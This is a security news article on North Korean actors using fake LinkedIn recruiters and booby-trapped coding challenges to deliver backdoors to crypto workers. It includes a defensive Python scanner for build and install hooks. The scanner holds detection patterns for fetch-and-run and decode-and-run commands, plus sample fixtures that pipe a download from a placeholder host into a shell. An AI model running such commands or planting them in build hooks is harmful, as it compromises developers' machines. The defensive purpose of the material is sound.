North Korean Hackers Using LinkedIn to Spread RustDoor Malware

Cybersecurity researchers continue to warn that North Korean threat actors are approaching potential victims on LinkedIn in order to deliver a backdoor known as RustDoor.

According to a recent advisory from Jamf Threat Labs, a user was contacted on LinkedIn by someone pretending to be a recruiter for a legitimate decentralized cryptocurrency exchange called STON.fi. This is just one example of how Democratic People’s Republic of Korea (DPRK)-backed cyber attackers are infiltrating networks under the guise of job interviews or coding assignments.

These attacks are aimed at the financial and cryptocurrency sectors, which are prime targets for these state-sponsored adversaries. Their objective is clear: to generate illicit revenue by exploiting companies and individuals in the crypto industry.

The attackers use highly tailored and sophisticated social engineering tactics to trick employees of decentralized finance (DeFi) and cryptocurrency businesses. In some cases, they request that individuals execute code or download applications on company devices.

North Korean attackers often ask their targets to complete "pre-employment tests" that involve running unfamiliar Node.js or PyPI packages, scripts, or GitHub repositories. One recent attack detected by Jamf tricked the victim into downloading a booby-trapped Visual Studio project as part of a coding challenge. The project contained embedded commands that downloaded two second-stage payloads, VisualStudioHelper and zsh_env, both of which function as backdoors.
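The practical defence against a booby-trapped "coding challenge" is to inspect what a project will run automatically before building or installing it. The script below is an added example written for this page; it is not code from Jamf's report or from the article. It scans the places where an IDE or package manager executes commands without asking (npm lifecycle scripts in package.json, PreBuildEvent/PostBuildEvent and Exec tasks in Visual Studio project files, and setup.py or shell scripts) for fetch-and-run or decode-and-run patterns. The sample project it builds in a temporary directory is constructed for the demonstration, and the hostname cdn.example.invalid is a placeholder, not an indicator from the campaign.

```python
"""Triage a downloaded 'coding challenge' project before building it.

Added example, not from the Jamf report or the article. Looks for build and
install hooks that download and execute remote content. All sample files and
the hostname cdn.example.invalid are constructed placeholders.
"""
import html
import json
import re
import tempfile
from pathlib import Path

NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")
VS_SUFFIXES = {".csproj", ".vcxproj", ".props", ".targets"}
SCRIPT_SUFFIXES = {".sh", ".zsh", ".bash", ".py", ".ps1"}

# Command shapes that fetch-and-run or decode-and-run inside a build hook.
SUSPICIOUS = [
    ("pipe download to shell",
     re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b", re.I)),
    ("download then execute",
     re.compile(r"\b(curl|wget)\b.*(&&|;)\s*(chmod|\.|source|(ba|z)?sh)\b", re.I)),
    ("base64 decode", re.compile(r"\bbase64\b\s+(-d|-D|--decode)\b")),
    ("PowerShell remote fetch",
     re.compile(r"\b(Invoke-WebRequest|iwr|DownloadString|iex)\b", re.I)),
    ("AppleScript execution", re.compile(r"\bosascript\b", re.I)),
]
VS_TAG = re.compile(r"<(PreBuildEvent|PostBuildEvent|PreLinkEvent|Command)>(.*?)</\1>", re.S)
VS_EXEC = re.compile(r'<Exec\b[^>]*\bCommand="([^"]*)"', re.S)


def _classify(command):
    """Return the names of every suspicious pattern that matches `command`."""
    return [name for name, rx in SUSPICIOUS if rx.search(command)]


def _hooks_in(path):
    """Yield (location, command) pairs that run automatically for this file."""
    suffix = path.suffix.lower()
    if path.name == "package.json":
        try:
            scripts = json.loads(path.read_text(errors="replace")).get("scripts", {})
        except (json.JSONDecodeError, AttributeError):
            return
        for hook in NPM_HOOKS:
            if hook in scripts:
                yield f"scripts.{hook}", str(scripts[hook])
    elif suffix in VS_SUFFIXES:
        xml = path.read_text(errors="replace")
        for tag, body in VS_TAG.findall(xml):
            yield tag, html.unescape(body)      # &amp;&amp; -> &&
        for cmd in VS_EXEC.findall(xml):
            yield "Exec", html.unescape(cmd)
    elif suffix in SCRIPT_SUFFIXES or path.name in ("setup.py", "pyproject.toml"):
        for lineno, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
            yield f"line {lineno}", line


def scan_project(root):
    """Walk `root` and return findings as (relative path, location, reasons)."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        if "node_modules" in path.parts or ".git" in path.parts:
            continue
        for location, command in _hooks_in(path):
            reasons = _classify(command)
            if reasons:
                findings.append((str(path.relative_to(root)), location, reasons))
    return findings


def demo():
    """Build a constructed sample project in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        # npm lifecycle hook that pipes a download straight into a shell.
        (root / "package.json").write_text(json.dumps({
            "name": "interview-task",
            "scripts": {"test": "jest",
                        "postinstall": "curl -fsSL https://cdn.example.invalid/helper | sh"}}))
        # Visual Studio pre-build step that downloads a file and makes it executable.
        (root / "Challenge.csproj").write_text(
            "<Project><PropertyGroup><PreBuildEvent>"
            "curl -o /tmp/zsh_env https://cdn.example.invalid/z &amp;&amp; chmod +x /tmp/zsh_env"
            "</PreBuildEvent></PropertyGroup></Project>")
        # Benign setup.py for contrast; should produce no finding.
        (root / "setup.py").write_text("from setuptools import setup\nsetup(name='task')\n")
        return scan_project(root)


if __name__ == "__main__":
    for rel, where, why in demo():
        print(f"{rel}: {where}: {', '.join(why)}")
```

Run it against a real clone with `scan_project("/path/to/challenge")` before opening the project in an IDE or running `npm install`; a hit is a reason to stop and examine the command, not proof of malice, and the pattern list is deliberately small so it can be extended with whatever your environment considers abnormal in a build step.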

RustDoor, a backdoor first documented by Bitdefender in February 2024, has now been attributed to North Korean threat actors for the first time. It was previously known as a Rust-based macOS backdoor, with a separate Windows counterpart, used against cryptocurrency firms among other targets.

In this campaign the payloads were written in Objective-C rather than Rust and delivered through the booby-trapped coding challenge. Once running, VisualStudioHelper displays a password prompt disguised as a legitimate Visual Studio dialog to capture the victim's system password. The malware then collects and exfiltrates files from the host and communicates with remote command-and-control (C2) servers.

Researchers Jaron Bradley and Ferdous Saljooki from Jamf highlighted the importance of training employees—especially developers—to be cautious when engaging with unknown contacts on social media platforms like LinkedIn. "These social engineering schemes performed by the DPRK come from attackers who are well-versed in English and highly informed about their targets," the researchers emphasized.

As the attacks continue to evolve, organizations within the crypto industry must stay vigilant and invest in robust cybersecurity awareness training to protect against these sophisticated campaigns.

© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067